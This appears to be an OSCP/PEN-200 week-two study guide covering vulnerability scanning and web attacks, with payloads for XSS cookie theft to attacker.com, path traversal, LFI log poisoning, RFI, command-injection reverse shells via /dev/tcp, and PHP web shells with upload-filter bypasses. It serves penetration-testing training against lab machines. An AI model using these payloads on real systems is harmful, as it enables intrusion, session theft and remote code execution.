Reconnaissance, Scanning & Web Application Attacks
WEEK2 - Reconnaissance, Scanning & Web Application Attacks
Reconnaissance, Scanning & Web Application Attacks
π‘οΈ Week 2: Reconnaissance, Scanning & Web Application Attacks (Part 1)
OSCP / PEN-200 Study Plan β Complete Detail Guide
π Overview
Building on Week 1 fundamentals, this week deepens reconnaissance and scanning techniques, transitioning into active vulnerability identification and web application exploitation. A significant portion is dedicated to understanding and exploiting common web vulnerabilities frequently encountered in OSCP labs and the exam.
π‘ Highlight: The week includes a mentor-reviewed Bash automation challenge that brings your scripting skills into a real offensive workflow.
π― Learning Objectives
By the end of Week 2, you should be able to:
- Perform comprehensive vulnerability scanning using automated tools (Nessus, Nmap NSE)
- Identify and exploit common web vulnerabilities: XSS, LFI, RFI, Command Injection
- Use Burp Suite effectively for web application analysis and exploitation
- Develop and refine Bash scripts for automating reconnaissance tasks
- Understand file upload vulnerabilities and bypass common restrictions
π Key Topics & Tools
π 1. Vulnerability Scanning
π§ Nessus
Nessus is a powerful, industry-standard vulnerability scanner. Focus on:
| Topic | Description |
|---|---|
| Installation | Install Nessus on Kali Linux; configure the web UI |
| Components | Understand policies, scan templates, and plugins |
| Unauthenticated Scans | Discover open ports and banners without credentials |
| Authenticated Scans | Use credentials to perform deep OS-level checks |
| Analyzing Results | Interpret severity ratings (Critical/High/Medium/Low/Info) |
| Plugins | Understand how Nessus plugins map to CVEs and vulnerabilities |
Key Tasks:
- Run both authenticated and unauthenticated scans against a target VM
- Export and analyze the Nessus report
- Identify exploitable findings and cross-reference with ExploitDB
π§ Nmap Scripting Engine (NSE) β Vulnerability Scripts
1
2
3
4
5
6
7
8
9
10
11
# Run vulnerability category scripts against a target
nmap --script vuln -sV -p- <target_ip>
# Run specific CVE check
nmap --script vuln --script-args=unsafe=1 -p 445 <target_ip>
# Discover SMB vulnerabilities (e.g., EternalBlue)
nmap --script smb-vuln* -p 445 <target_ip>
# HTTP-based vulnerability scripts
nmap --script http-vuln* -p 80,443 <target_ip>
NSE Script Categories to Know:
| Category | Purpose |
|---|---|
vuln | General vulnerability detection |
exploit | Attempts to exploit identified vulnerabilities |
auth | Tests for weak/default credentials |
brute | Brute force attacks |
safe | Non-destructive information gathering |
π 2. Web Application Attacks (Part 1)
π§ Burp Suite β Core Setup & Workflow
Burp Suite Community Edition is sufficient for OSCP.
Initial Setup:
1
2
3
4
1. Open Burp Suite β Proxy β Options β Add listener on 127.0.0.1:8080
2. Configure browser (Firefox) to use 127.0.0.1:8080 as HTTP proxy
3. Install Burp's CA certificate in the browser (for HTTPS interception)
4. Turn Intercept ON to begin capturing requests
Key Burp Suite Modules:
| Module | Description | Use Case |
|---|---|---|
| Proxy | Intercepts HTTP/S traffic | Capture and inspect all requests/responses |
| Repeater | Manually re-send modified requests | Test parameter manipulation, auth bypass |
| Intruder | Automated fuzzing and brute force | Payloads for XSS, SQLi, directory brute |
| Decoder | Encode/decode URL, Base64, HTML | Analyze obfuscated inputs |
| Comparer | Diff two requests or responses | Identify changes in application behavior |
Tips:
- Right-click any request β Send to Repeater to manually modify and resend
- Use Intruder with a wordlist for parameter fuzzing
π₯ Cross-Site Scripting (XSS)
XSS allows attackers to inject malicious scripts into web pages viewed by other users.
Types of XSS:
| Type | Description | Persistence |
|---|---|---|
| Reflected XSS | Payload is in the URL/request, reflected back in the response | Non-persistent |
| Stored XSS | Payload is saved in the database and served to all visitors | Persistent |
| DOM-based XSS | Payload executes through client-side JavaScript DOM manipulation | Non-persistent |
Basic Payloads to Try:
1
2
3
4
5
6
7
8
9
10
11
12
<!-- Basic alert test -->
<script>alert('XSS')</script>
<!-- Bypass single quote filters -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- Event handler-based -->
<img src=x onerror="alert('XSS')">
<svg onload="alert('XSS')">
<!-- Cookie stealing (for stored/reflected) -->
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
Filter Bypass Techniques:
- Case variation:
<ScRiPt>alert(1)</sCrIpT> - Double encoding:
%253Cscript%253E - Null bytes:
<scr\0ipt>alert(1)</scr\0ipt> - Using JavaScript pseudo-protocol:
javascript:alert(1)
π Directory Traversal (Path Traversal)
Exploiting improper input validation to read files outside the web root.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Basic traversal
http://target.com/view?file=../../../../etc/passwd
# URL encoded
http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Double URL encoded
http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd
# With null byte (older PHP versions)
http://target.com/view?file=../../../../etc/passwd%00
# Windows paths
http://target.com/view?file=..\..\..\..\windows\win.ini
Common Files to Target:
| OS | Path | Content |
|---|---|---|
| Linux | /etc/passwd | User accounts |
| Linux | /etc/shadow | Password hashes (root required) |
| Linux | /proc/self/environ | Environment variables |
| Windows | C:\windows\win.ini | Windows config |
| Windows | C:\windows\system32\drivers\etc\hosts | Host file |
π Local File Inclusion (LFI) / Remote File Inclusion (RFI)
LFI/RFI occur when user-supplied input is passed to a include() or require() function.
LFI Examples:
1
2
3
4
5
6
7
8
9
10
11
12
# Read sensitive files
http://target.com/page?lang=../../../../etc/passwd
# PHP session poisoning
http://target.com/page?lang=../../../../var/lib/php/sessions/sess_<SESSION_ID>
# Log poisoning (inject PHP into Apache log, then LFI the log)
# Step 1: Inject PHP code via User-Agent header
curl -A "<?php system($_GET['cmd']); ?>" http://target.com/
# Step 2: LFI the log file
http://target.com/page?lang=../../../../var/log/apache2/access.log&cmd=id
RFI Examples:
1
2
3
4
5
6
7
8
# Host a malicious PHP file on your attack machine
# In attacker machine: python3 -m http.server 80
# malicious.php: <?php system($_GET['cmd']); ?>
http://target.com/page?lang=http://attacker_ip/malicious.php&cmd=id
# PHP filter wrapper for LFI to read source code
http://target.com/page?lang=php://filter/convert.base64-encode/resource=index.php
π Command Injection
When user input is passed to shell commands without sanitization.
Injection Separators:
| Separator | OS | Behavior |
|---|---|---|
; | Linux | Execute both commands |
&& | Both | Execute second only if first succeeds |
\| | Both | Execute second only if first fails |
\| | Both | Pipe output of first into second |
\n / %0a | Linux | Newline separator |
` (backtick) | Linux | Execute in subshell |
$() | Linux | Command substitution |
Blind Command Injection (Out-of-Band):
1
2
3
4
5
6
7
8
# Time-based blind injection
127.0.0.1; sleep 5
# DNS exfiltration (using Burp Collaborator or interactsh)
127.0.0.1; nslookup attacker-callback.com
# Reverse shell via command injection
127.0.0.1; bash -i >& /dev/tcp/attacker_ip/4444 0>&1
π€ File Upload Vulnerabilities
Exploiting improper file type validation to upload malicious files (web shells).
Common Bypass Techniques:
| Technique | Method |
|---|---|
| Extension bypass | Rename shell.php to shell.php.jpg or shell.phtml |
| MIME type spoofing | Change Content-Type: application/x-php to image/jpeg |
| Magic bytes bypass | Add GIF89a at the start of a PHP file |
| Double extension | shell.jpg.php |
| Case manipulation | shell.PhP, shell.PHP |
| Null byte | shell.php%00.jpg (older systems) |
Basic PHP Web Shell:
1
<?php system($_GET['cmd']); ?>
GIF + PHP hybrid (bypass content checks):
1
2
GIF89a;
<?php system($_GET['cmd']); ?>
After upload, locate the file and execute:
1
2
3
http://target.com/uploads/shell.php?cmd=id
http://target.com/uploads/shell.php?cmd=whoami
http://target.com/uploads/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/attacker_ip/4444+0>%261'
π΄ Bash Automation Challenge (Mentor-Reviewed)
This weekβs hands-on challenge requires you to write a Bash recon automation script.
Challenge Goals:
- Automate
nmapscanning (open ports β service detection β vuln scripts) - Parse results and highlight potential vulnerabilities
- Auto-trigger web checks if HTTP/HTTPS ports are found
Starter Template:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/bash
# Week 2 OSCP Recon Automation Script
TARGET=$1
OUTPUT_DIR="./recon_$TARGET"
mkdir -p $OUTPUT_DIR
echo "[*] Starting Nmap port scan on $TARGET..."
nmap -sS -p- --min-rate 5000 -oN $OUTPUT_DIR/ports.txt $TARGET
echo "[*] Extracting open ports..."
PORTS=$(grep "^[0-9]" $OUTPUT_DIR/ports.txt | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
echo "[*] Running service/version scan on ports: $PORTS"
nmap -sV -sC -p $PORTS -oN $OUTPUT_DIR/services.txt $TARGET
echo "[*] Running vulnerability scripts..."
nmap --script vuln -p $PORTS -oN $OUTPUT_DIR/vulns.txt $TARGET
# Check for web ports
if echo "$PORTS" | grep -qE '(80|443|8080|8443)'; then
echo "[*] Web port detected. Running HTTP checks..."
# Add gobuster, nikto, curl checks here
nikto -h http://$TARGET -o $OUTPUT_DIR/nikto.txt
fi
echo "[+] Recon complete. Results saved in $OUTPUT_DIR/"
β Submit this script to your mentor with at least 3 test runs against Proving Ground labs.
ποΈ Practice Resources
OffSec PEN-200 Labs (Required Reading & Labs)
| Module | Focus Area |
|---|---|
| Security Testing with Burp Suite | Proxy, Repeater, Intruder |
| Enumerating and Abusing APIs | REST API attack surface |
| Privilege Escalation via XSS | Stored XSS β session hijack |
| Directory Traversal | Path traversal exploitation |
| LFI / RFI | File inclusion to RCE |
| OS Command Injection | Web input β shell |
π§ͺ Proving Ground Practice Labs (Recommended Order)
| Machine | Difficulty | Key Skills |
|---|---|---|
helpdesk | Easy | Web application enumeration |
law | Easy | Command injection |
payday | Easy | LFI / credential disclosure |
uc404 | Easy | Web fuzzing, file upload |
xposedapi | Medium | API enumeration and exploitation |
Apex | Medium | Multi-vector web attack |
reconstruction | Medium | Chained web vulnerabilities |
slort | Medium | RFI to reverse shell |
π Approach each box by: Enumerate β Identify vulnerability type β Exploit manually β Automate with Burp/scripts
π External Resources
| Resource | Purpose | Link |
|---|---|---|
| PortSwigger Web Security Academy | Best free hands-on web vuln labs | portswigger.net/web-security |
| HackTricks | Comprehensive technique reference | book.hacktricks.xyz |
| PayloadsAllTheThings | Exploit payload cheatsheets | GitHub: swisskyrepo |
| RevShells | Reverse shell generator | revshells.com |
| GTFOBins | Unix binary exploitation | gtfobins.github.io |
π Suggested Daily Schedule (7-Day Breakdown)
| Day | Focus | Hours |
|---|---|---|
| Day 1 | Nessus installation, authenticated/unauthenticated scans | 3β4 hrs |
| Day 2 | Nmap NSE vuln scripts + analyzing results | 3β4 hrs |
| Day 3 | Burp Suite setup, XSS (Reflected + Stored) β PortSwigger labs | 4β5 hrs |
| Day 4 | Directory Traversal + LFI/RFI + PEN-200 modules | 4β5 hrs |
| Day 5 | Command Injection + File Upload vulnerabilities | 4β5 hrs |
| Day 6 | Proving Ground labs: helpdesk, law, payday, uc404 | 5β6 hrs |
| Day 7 | Bash automation script β mentor review + catch-up / review | 3β4 hrs |
β Week 2 Checklist
Vulnerability Scanning
- Nessus installed and functional
- Completed authenticated and unauthenticated scans
- Analyzed and interpreted Nessus results
- Used
nmap --script vulnagainst at least 3 targets
Web Application Attacks
- Burp Suite proxy set up and intercepting traffic
- Exploited Reflected XSS on PortSwigger lab
- Exploited Stored XSS on PortSwigger lab
- Completed Directory Traversal lab (read
/etc/passwd) - Exploited LFI vulnerability
- Attempted RFI exploitation (or PHP filter wrapper)
- Exploited at least one Command Injection scenario
- Bypassed file upload restriction and executed a web shell
Proving Ground Labs
- Completed
helpdesk - Completed
law - Completed
payday - Completed at least one medium box (
xposedapi/slort)
Bash Automation
- Written and tested the recon automation script
- Submitted for mentor review
π Key Takeaways
- Always try manual exploitation first β understand the vulnerability before reaching for automated tools.
- Burp Suite is your best friend β master Repeater and Intruder before the exam.
- Web vulnerabilities chain together β LFI + log poisoning β RCE is a classic OSCP path.
- Document everything β Take screenshots, save requests/responses, and maintain detailed notes.
- Think like a developer β where would you trust user input? Thatβs where vulnerabilities live.
| _Plan prepared for OSCP / PEN-200 Week 2 | Reconnaissance β Vulnerability Scanning β Web Application Attacks_ |
You can find me online at:
This post is licensed under CC BY 4.0 by the author.